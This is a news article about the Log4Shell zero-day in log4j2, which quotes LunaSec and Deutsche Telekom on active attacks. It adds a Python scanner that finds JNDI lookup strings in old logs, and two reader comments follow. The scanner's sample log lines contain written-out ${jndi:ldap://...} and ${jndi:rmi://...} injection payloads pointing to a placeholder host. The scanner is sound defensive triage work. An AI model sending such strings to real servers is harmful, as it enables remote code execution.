A critical zero-day exploit found in the popular Java logging library log4j2 is under active attack. The exploit affects numerous services and companies including Apple iCloud, Minecraft, Steam, Twitter, Baidu, Tencent, Amazon, Tesla and likely many more.
LunaSec reports:
A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable).
A proof of concept was shared on GitHub, alongside screenshots demonstrating iCloud's exposure.
Another proof of concept changes the iPhone's device name to demonstrate the vulnerability. LunaSec notes that this only shows the vulnerability exists on iPhones; at this time there is no known remote method of triggering it.
Deutsche Telekom also confirmed that its logs show active attacks underway.
"We are observing attacks in our honeypot infrastructure coming from the TOR network."
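The article only says the bug is triggered by "logging a certain string". The public advisory for CVE-2021-44228 identifies that string as a Log4j lookup expression of the form ${jndi:...} placed in attacker-controlled input that the application later logs. The following is an added triage example, not code from this article or from LunaSec: a small scanner that walks existing log lines, extracts balanced ${...} lookup expressions, and reports any whose prefix is a JNDI lookup, with the scheme and target host so responders can pivot to network logs. The sample log lines, the host name example.invalid and the Finding type are constructed for this example.

```python
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    """One suspicious lookup expression found in a log line (constructed type)."""
    line_no: int      # 1-based index into the scanned lines
    expression: str   # the full ${...} expression as it appeared
    scheme: str       # jndi provider scheme, e.g. "ldap" or "rmi", lower-cased
    target: str       # host[:port] the lookup would have contacted


LOOKUP_OPEN = "${"

# Matches the start of a JNDI lookup: ${ jndi : <scheme> : [//] <host[:port]>
# Case-insensitive because Log4j treats the lookup name case-insensitively.
JNDI_RE = re.compile(
    r"^\$\{\s*jndi\s*:\s*([A-Za-z][A-Za-z0-9+.-]*):(?://)?([^/}\s]*)",
    re.IGNORECASE,
)


def extract_lookups(text: str) -> List[str]:
    """Return every balanced ${...} expression in text, outermost only, left to right."""
    results: List[str] = []
    i, n = 0, len(text)
    while i < n:
        start = text.find(LOOKUP_OPEN, i)
        if start == -1:
            break
        depth, j, end = 0, start, -1
        while j < n:
            if text.startswith(LOOKUP_OPEN, j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    end = j
                    break
            j += 1
        if end == -1:
            # Unterminated expression: skip past this opener and keep scanning.
            i = start + 2
            continue
        results.append(text[start:end + 1])
        i = end + 1
    return results


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Scan already-written log lines for JNDI lookup expressions."""
    findings: List[Finding] = []
    for idx, line in enumerate(lines, start=1):
        for expr in extract_lookups(line):
            m = JNDI_RE.match(expr)
            if m:
                findings.append(Finding(idx, expr, m.group(1).lower(), m.group(2)))
    return findings


# Constructed sample: an access log where a client placed lookups in the User-Agent field.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 812 "-" '
    '"${jndi:ldap://example.invalid:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET /api HTTP/1.1" 200 64 "-" '
    '"${java:version} ${JNDI:RMI://example.invalid/x}"',
]


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup to {f.target}  <- {f.expression}")
```

The benign ${java:version} lookup on the third line is extracted but not reported, because only expressions whose lookup name is jndi are flagged. The match is on the literal, case-insensitive prefix, so treat this as a triage aid for historical logs rather than a complete detector; the actual fix is patching Log4j, with log review used to find hosts that received lookup strings before the patch was applied.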
Comments (2)
LeoNyx86 - December 12, 2021 at 10:27am
Maybe personal details and data that belongs to a person should be deleted everywhere online. And it should be kept on an offline storage device like a swipe card. The only data that should be stored online are the card key numbers encrypted and jumbled. Or that any data online cannot be accessed without the card, by the person or anyone else.
The cards would feature biometric security such as fingerprints, bio-impedance, an active pulse. Maybe a palm scanner with a lie detector and a Face ID including iris scanner with a lie detector.
You would be asked three questions or such. And the voice recognition would also feature an authentication and lie detector.
You have to pass all tests to gain access.
A-Non-E-Moose - December 11, 2021 at 12:12am
Is this the same one that affected much of AWS on Dec 8th?